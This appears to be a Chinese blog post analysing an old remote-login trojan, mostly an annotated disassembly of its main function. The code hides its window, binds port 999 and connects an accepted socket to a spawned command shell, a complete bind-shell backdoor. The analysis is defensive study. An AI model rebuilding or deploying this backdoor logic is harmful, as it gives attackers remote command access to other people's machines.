minim木马分析

又是一个比较菜的木马分析，很久以前的木马，大家不要见笑。不积跬步无以至千里，我还是慢慢来呵呵。利用telent可以远程登录
基本信息

  报告名称：mini木马分析                                                   
  作者：                                                           
  报告更新日期：                                           
  样本发现日期：        2012.09.11                                   
  样本类型：                                                   
  样本文件大小／被感染文件变化长度：   
  样本文件MD5 校验值：                            
  样本文件SHA1 校验值：                           
  壳信息：                                                       
  可能受到威胁的系统：                               
  相关漏洞：                                                   
  已知检测名称：                                           

简介
远程登录木马

网络症状

被监听的端口 999

详细分析／功能介绍
1.隐藏窗口
2.绑定999端口
3.监听等待客户端的连接请求
4.连接客户端
5.远程登录

预防及修复措施
设置防火墙，关注杀软提示

.text:00411410 wmain           proc near               ; CODE XREF: j_wmainj
.text:00411410
.text:00411410 var_504         = byte ptr -504h
.text:00411410 CommandLine     = word ptr -440h
.text:00411410 StartupInfo     = _STARTUPINFOW ptr -238h
.text:00411410 Dst             = dword ptr -1ECh
.text:00411410 hObject         = dword ptr -1E8h
.text:00411410 addrlen         = dword ptr -1D4h
.text:00411410 name            = sockaddr ptr -1C8h
.text:00411410 var_1B0         = dword ptr -1B0h
.text:00411410 s               = dword ptr -1A4h
.text:00411410 WSAData         = WSAData ptr -198h
.text:00411410 var_4           = dword ptr -4
.text:00411410
.text:00411410                 push    ebp
.text:00411411                 mov     ebp, esp
.text:00411413                 sub     esp, 504h
.text:00411419                 push    ebx
.text:0041141A                 push    esi
.text:0041141B                 push    edi
.text:0041141C                 lea     edi, [ebp+var_504]
.text:00411422                 mov     ecx, 141h
.text:00411427                 mov     eax, 0CCCCCCCCh
.text:0041142C                 rep stosd
.text:0041142E                 mov     eax, __security_cookie
.text:00411433                 xor     eax, ebp
.text:00411435                 mov     [ebp+var_4], eax
.text:00411438                 mov     esi, esp
隐藏窗口
.text:0041143A                 push    0               ; nCmdShow
.text:0041143C                 push    0               ; hWnd
.text:0041143E                 call    ds:__imp__ShowWindow@8 ; ShowWindow(x,x)
初始化数据
.text:00411444                 cmp     esi, esp
.text:00411446                 call    j__RTC_CheckEsp；  unicode校验函数
.text:0041144B                 push    10h             ; Size
.text:0041144D                 push    0               ; Val
.text:0041144F                 lea     eax, [ebp+Dst]
.text:00411455                 push    eax             ; Dst
.text:00411456                 call    j__memset
.text:0041145B                 add     esp, 0Ch
.text:0041145E                 push    44h             ; Size
.text:00411460                 push    0               ; Val
.text:00411462                 lea     eax, [ebp+StartupInfo]
.text:00411468                 push    eax             ; Dst
.text:00411469                 call    j__memset
.text:0041146E                 add     esp, 0Ch
.text:00411471                 push    0FFh            ; Size
.text:00411476                 push    0               ; Val
.text:00411478                 lea     eax, [ebp+CommandLine]
.text:0041147E                 push    eax             ; Dst
.text:0041147F                 call    j__memset
.text:00411484                 add     esp, 0Ch
.text:00411487                 mov     esi, esp
.text:00411489                 push    1FEh            ; nSize
.text:0041148E                 lea     eax, [ebp+CommandLine]
.text:00411494                 push    eax             ; lpBuffer
.text:00411495                 push    offset Name     ; 
COMSPEC 变量表示为: COMSPEC=C:\COMMAND.COM 获取命令行路径
.text:0041149A                 call    ds:__imp__GetEnvironmentVariableW@12 ; GetEnvironmentVariableW(x,x,x)
.text:004114A0                 cmp     esi, esp
.text:004114A2                 call    j__RTC_CheckEsp
.text:004114A7                 mov     esi, esp
.text:004114A9                 lea     eax, [ebp+WSAData]
套接字编程的初始化
.text:004114AF                 push    eax             ; lpWSAData
.text:004114B0                 push    202h            ; wVersionRequested
.text:004114B5                 call    ds:__imp__WSAStartup@8 ; WSAStartup(x,x)
.text:004114BB                 cmp     esi, esp
.text:004114BD                 call    j__RTC_CheckEsp
.text:004114C2                 mov     esi, esp
创建套接字
.text:004114C4                 push    0               ; dwFlags
.text:004114C6                 push    0               ; g
.text:004114C8                 push    0               ; lpProtocolInfo
.text:004114CA                 push    6               ; protocol
.text:004114CC                 push    1               ; type
.text:004114CE                 push    2               ; af
.text:004114D0                 call    ds:__imp__WSASocketW@24 ; WSASocketW(x,x,x,x,x,x)
.text:004114D6                 cmp     esi, esp
.text:004114D8                 call    j__RTC_CheckEsp
.text:004114DD                 mov     [ebp+s], eax
.text:004114E3                 mov     eax, 2
.text:004114E8                 mov     [ebp+name.sa_family], ax
.text:004114EF                 mov     dword ptr [ebp+name.sa_data+2], 0
.text:004114F9                 mov     esi, esp
.text:004114FB                 push    999             ; hostshort
.text:00411500                 call    ds:__imp__htons@4 ; htons(x)
.text:00411506                 cmp     esi, esp
.text:00411508                 call    j__RTC_CheckEsp
.text:0041150D                 mov     word ptr [ebp+name.sa_data], ax
.text:00411514                 mov     esi, esp
绑定端口999
.text:00411516                 push    10h             ; namelen
.text:00411518                 lea     eax, [ebp+name]
.text:0041151E                 push    eax             ; name
.text:0041151F                 mov     ecx, [ebp+s]
.text:00411525                 push    ecx             ; s
.text:00411526                 call    ds:__imp__bind@12 ;
.text:0041152C                 cmp     esi, esp
.text:0041152E                 call    j__RTC_CheckEsp
.text:00411533                 mov     esi, esp
监听
.text:00411535                 push    1               ; backlog
.text:00411537                 mov     eax, [ebp+s]
.text:0041153D                 push    eax             ; s
.text:0041153E                 call    ds:__imp__listen@8 ;
.text:00411544                 cmp     esi, esp
.text:00411546                 call    j__RTC_CheckEsp
.text:0041154B                 mov     [ebp+addrlen], 10h
.text:00411555                 mov     esi, esp
连接远程服务器
.text:00411557                 lea     eax, [ebp+addrlen]
.text:0041155D                 push    eax             ; addrlen
.text:0041155E                 lea     ecx, [ebp+name]
.text:00411564                 push    ecx             ; addr
.text:00411565                 mov     edx, [ebp+s]
.text:0041156B                 push    edx             ; s
.text:0041156C                 call    ds:__imp__accept@12 ;
.text:00411572                 cmp     esi, esp
.text:00411574                 call    j__RTC_CheckEsp
.text:00411579                 mov     [ebp+var_1B0], eax
.text:0041157F                 mov     [ebp+StartupInfo.cb], 44h
.text:00411589                 xor     eax, eax
.text:0041158B                 mov     [ebp+StartupInfo.wShowWindow], ax
.text:00411592                 mov     [ebp+StartupInfo.dwFlags], 101h
.text:0041159C                 mov     eax, [ebp+var_1B0]
.text:004115A2                 mov     [ebp+StartupInfo.hStdError], eax ; 设置进程的输入输出缓冲区句柄为套接字
.text:004115A8                 mov     eax, [ebp+var_1B0]
.text:004115AE                 mov     [ebp+StartupInfo.hStdInput], eax
.text:004115B4                 mov     eax, [ebp+var_1B0]
.text:004115BA                 mov     [ebp+StartupInfo.hStdOutput], eax
.text:004115C0                 mov     esi, esp
.text:004115C2                 lea     eax, [ebp+Dst]
.text:004115C8                 push    eax             ; lpProcessInformation
.text:004115C9                 lea     ecx, [ebp+StartupInfo]
创建进程 打开命令行 命令行的输入输出缓冲区为 已套接字
.text:004115CF                 push    ecx             ; lpStartupInfo
.text:004115D0                 push    0               ; lpCurrentDirectory
.text:004115D2                 push    0               ; lpEnvironment
.text:004115D4                 push    0               ; dwCreationFlags
.text:004115D6                 push    1               ; bInheritHandles
.text:004115D8                 push    0               ; lpThreadAttributes
.text:004115DA                 push    0               ; lpProcessAttributes
.text:004115DC                 lea     edx, [ebp+CommandLine]
.text:004115E2                 push    edx             ; lpCommandLine
.text:004115E3                 push    0               ; lpApplicationName
.text:004115E5                 call    ds:__imp__CreateProcessW@40 ; CreateProcessW(x,x,x,x,x,x,x,x,x,x)
.text:004115EB                 cmp     esi, esp        ;
.text:004115ED                 call    j__RTC_CheckEsp
.text:004115F2                 mov     esi, esp
等待进程创建完毕
.text:004115F4                 push    0FFFFFFFFh      ; dwMilliseconds
.text:004115F6                 mov     eax, [ebp+Dst]
.text:004115FC                 push    eax             ; hHandle
.text:004115FD                 call    ds:__imp__WaitForSingleObject@8 ; WaitForSingleObject(x,x)
.text:00411603                 cmp     esi, esp        ;
.text:00411605                 call    j__RTC_CheckEsp
.text:0041160A                 mov     esi, esp
.text:0041160C                 mov     eax, [ebp+Dst]
.text:00411612                 push    eax             ; hObject
.text:00411613                 call    ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:00411619                 cmp     esi, esp
.text:0041161B                 call    j__RTC_CheckEsp
.text:00411620                 mov     esi, esp
.text:00411622                 mov     eax, [ebp+hObject]
.text:00411628                 push    eax             ; hObject
.text:00411629                 call    ds:__imp__CloseHandle@4 ; CloseHandle(x)
.text:0041162F                 cmp     esi, esp
.text:00411631                 call    j__RTC_CheckEsp
.text:00411636                 mov     esi, esp        ; 关闭句柄
.text:00411638                 mov     eax, [ebp+s]
.text:0041163E                 push    eax             ; s
.text:0041163F                 call    ds:__imp__closesocket@4 ; closesocket(x)
.text:00411645                 cmp     esi, esp
.text:00411647                 call    j__RTC_CheckEsp
.text:0041164C                 mov     esi, esp
.text:0041164E                 mov     eax, [ebp+var_1B0]
.text:00411654                 push    eax             ; s
.text:00411655                 call    ds:__imp__closesocket@4 ; closesocket(x)
.text:0041165B                 cmp     esi, esp
.text:0041165D                 call    j__RTC_CheckEsp
.text:00411662                 mov     esi, esp
.text:00411664                 call    ds:__imp__WSACleanup@0 ; WSACleanup()
.text:0041166A                 cmp     esi, esp
.text:0041166C                 call    j__RTC_CheckEsp ; 关闭套接字，释放dll
.text:00411671                 xor     eax, eax
.text:00411673                 push    edx
.text:00411674                 mov     ecx, ebp
.text:00411676                 push    eax
.text:00411677                 lea     edx, dword_4116A4
.text:0041167D                 call    j__RTC_CheckStackVars
.text:00411682                 pop     eax
.text:00411683                 pop     edx
.text:00411684                 pop     edi
.text:00411685                 pop     esi
.text:00411686                 pop     ebx
.text:00411687                 mov     ecx, [ebp+var_4]
.text:0041168A                 xor     ecx, ebp
.text:0041168C                 call    j___security_check_cookie
.text:00411691                 add     esp, 504h
.text:00411697                 cmp     ebp, esp
.text:00411699                 call    j__RTC_CheckEsp
.text:0041169E                 mov     esp, ebp
.text:004116A0                 pop     ebp
.text:004116A1                 retn
.text:004116A1 wmain           endp
.text:004116A1